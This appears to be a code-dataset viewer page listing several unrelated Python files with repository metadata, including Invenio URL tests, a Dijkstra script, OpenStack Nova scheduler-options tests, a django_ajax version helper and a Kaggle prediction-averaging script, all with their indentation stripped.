"""urlutils - test get_relative_url"""
url_normal = "http://web.net"
self.assertEqual("", get_relative_url(url_normal))
url_normal_trailing = "http://web.net/"
self.assertEqual("", get_relative_url(url_normal_trailing))
url_more = "http://web.net/asd"
self.assertEqual("/asd", get_relative_url(url_more))
url_more_trailing = "http://web.net/asd/"
self.assertEqual("/asd", get_relative_url(url_more_trailing))
url_adv = "http://web.net/asd/qwe"
self.assertEqual("/asd/qwe", get_relative_url(url_adv))
url_adv_trailing = "http://web.net/asd/qwe/"
self.assertEqual("/asd/qwe", get_relative_url(url_adv_trailing))
TEST_SUITE = make_test_suite(TestWashUrlArgument,
TestUrls,
TestHtmlLinks,
TestEmailObfuscationMode,
TestRelativeURL)
if __name__ == "__main__":
run_test_suite(TEST_SUITE)
| jmartinm/invenio | modules/miscutil/lib/urlutils_unit_tests.py | Python | gpl-2.0 | 18,616 | 0.004835 |
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 17 19:41:46 2015
@author: deep
"""
from graph import weightedGraph
import heapq
def djikstra(a,S):
N = len(a.adjLst)
Visited = [False for i in xrange(N)]
Distance = [float('inf') for i in xrange(N)]
Distance[S] = 0
heap = []
heapq.heappush(heap,(0,S))
for i in xrange(N):
if heap:
while(True):
_,u = heapq.heappop(heap)
if not Visited[u]:
break
Visited[u] = True
for weight_uv,v in a.adjLst[u]:
if not Visited[v]:
if Distance[v] > Distance[u] + weight_uv:
Distance[v] = Distance[u] + weight_uv
heapq.heappush(heap, (Distance[v],v))
print Distance
return Distance
g = weightedGraph(4)
g.addEdge(0,1,1)
g.addEdge(1,2,2)
g.addEdge(2,3,3)
g.addEdge(3,0,4)
djikstra(g,0)
| ddeepak6992/Algorithms | Graph/Dijkstra.py | Python | gpl-2.0 | 935 | 0.019251 |
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For PickledScheduler.
"""
import datetime
import StringIO
from nova.openstack.common import jsonutils
from nova.scheduler import scheduler_options
from nova import test
class FakeSchedulerOptions(scheduler_options.SchedulerOptions):
def __init__(self, last_checked, now, file_old, file_now, data, filedata):
super(FakeSchedulerOptions, self).__init__()
# Change internals ...
self.last_modified = file_old
self.last_checked = last_checked
self.data = data
# For overrides ...
self._time_now = now
self._file_now = file_now
self._file_data = filedata
self.file_was_loaded = False
def _get_file_timestamp(self, filename):
return self._file_now
def _get_file_handle(self, filename):
self.file_was_loaded = True
return StringIO.StringIO(self._file_data)
def _get_time_now(self):
return self._time_now
class SchedulerOptionsTestCase(test.NoDBTestCase):
def test_get_configuration_first_time_no_flag(self):
last_checked = None
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = None
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
data = dict(a=1, b=2, c=3)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
{}, jdata)
self.assertEquals({}, fake.get_configuration())
self.assertFalse(fake.file_was_loaded)
def test_get_configuration_first_time_empty_file(self):
last_checked = None
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = None
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
jdata = ""
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
{}, jdata)
self.assertEquals({}, fake.get_configuration('foo.json'))
self.assertTrue(fake.file_was_loaded)
def test_get_configuration_first_time_happy_day(self):
last_checked = None
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = None
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
data = dict(a=1, b=2, c=3)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
{}, jdata)
self.assertEquals(data, fake.get_configuration('foo.json'))
self.assertTrue(fake.file_was_loaded)
def test_get_configuration_second_time_no_change(self):
last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1)
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
data = dict(a=1, b=2, c=3)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
data, jdata)
self.assertEquals(data, fake.get_configuration('foo.json'))
self.assertFalse(fake.file_was_loaded)
def test_get_configuration_second_time_too_fast(self):
last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1)
now = datetime.datetime(2011, 1, 1, 1, 1, 2)
file_old = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_now = datetime.datetime(2013, 1, 1, 1, 1, 1)
old_data = dict(a=1, b=2, c=3)
data = dict(a=11, b=12, c=13)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
old_data, jdata)
self.assertEquals(old_data, fake.get_configuration('foo.json'))
self.assertFalse(fake.file_was_loaded)
def test_get_configuration_second_time_change(self):
last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1)
now = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_old = datetime.datetime(2012, 1, 1, 1, 1, 1)
file_now = datetime.datetime(2013, 1, 1, 1, 1, 1)
old_data = dict(a=1, b=2, c=3)
data = dict(a=11, b=12, c=13)
jdata = jsonutils.dumps(data)
fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
old_data, jdata)
self.assertEquals(data, fake.get_configuration('foo.json'))
self.assertTrue(fake.file_was_loaded)
| Brocade-OpenSource/OpenStack-DNRM-Nova | nova/tests/scheduler/test_scheduler_options.py | Python | apache-2.0 | 5,241 | 0.001145 |
"""
Init
"""
from __future__ import unicode_literals
import datetime
import os
import subprocess
VERSION = (2, 2, 13, 'final', 0)
def get_version(version=None):
"""
Returns a PEP 386-compliant version number from VERSION.
"""
if not version:
version = VERSION
else:
assert len(version) == 5
assert version[3] in ('alpha', 'beta', 'rc', 'final')
# Now build the two parts of the version number:
# main = X.Y[.Z]
# sub = .devN - for pre-alpha releases
# | {a|b|c}N - for alpha, beta and rc releases
parts = 2 if version[2] == 0 else 3
main = '.'.join(str(x) for x in version[:parts])
sub = ''
if version[3] == 'alpha' and version[4] == 0:
git_changeset = get_git_changeset()
if git_changeset:
sub = '.dev%s' % git_changeset
elif version[3] != 'final':
mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
sub = mapping[version[3]] + str(version[4])
return str(main + sub)
def get_git_changeset():
"""
Returns a numeric identifier of the latest git changeset.
The result is the UTC timestamp of the changeset in YYYYMMDDHHMMSS format.
This value isn't guaranteed to be unique, but collisions are very unlikely,
so it's sufficient for generating the development version numbers.
"""
repo_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
git_log = subprocess.Popen('git log --pretty=format:%ct --quiet -1 HEAD',
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=True, cwd=repo_dir,
universal_newlines=True)
timestamp = git_log.communicate()[0]
try:
timestamp = datetime.datetime.utcfromtimestamp(int(timestamp))
except ValueError:
return None
return timestamp.strftime('%Y%m%d%H%M%S')
| RyanNoelk/ClanLadder | django_ajax/__init__.py | Python | mit | 1,900 | 0 |
# -*- coding: utf-8 -*-
import pandas as pd
from itertools import izip
import numpy as np
import glob
from facebook import FacebookCompetition
print('Loading test data')
bids = pd.read_csv(FacebookCompetition.__data__['bids'])
test = pd.read_csv(FacebookCompetition.__data__['test'])
te = pd.merge(test, bids, how='left')
del bids
files = glob.glob('data/facebook.te.*.txt.gz')
its = [iter(pd.read_table(f, header=-1, iterator=True, chunksize=2**15, compression='gzip')) for f in files]
#with open('data/facebook_softmax_20150506.csv', 'w') as out:
c = []
for i,chunks in enumerate(izip(*its)):
print(i)
A = np.array([np.c_[chunk.values,1-chunk.values] for chunk in chunks])
A = np.exp(np.log(A).mean(axis=0))
A /= A.sum(axis=1)[:, np.newaxis]
A = A[:,0]
df = pd.DataFrame(A)
df.index = chunks[0].index
df.columns = chunks[0].columns
c.append(df)
df = pd.concat(c)
df.index = te.bidder_id
df = df.groupby(level=0).mean()
df.columns = ['prediction']
df.to_csv('data/facebook.te.20150509_1.csv', index_label='bidder_id') | ldamewood/kaggle | facebook/combine.py | Python | mit | 1,058 | 0.005671 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.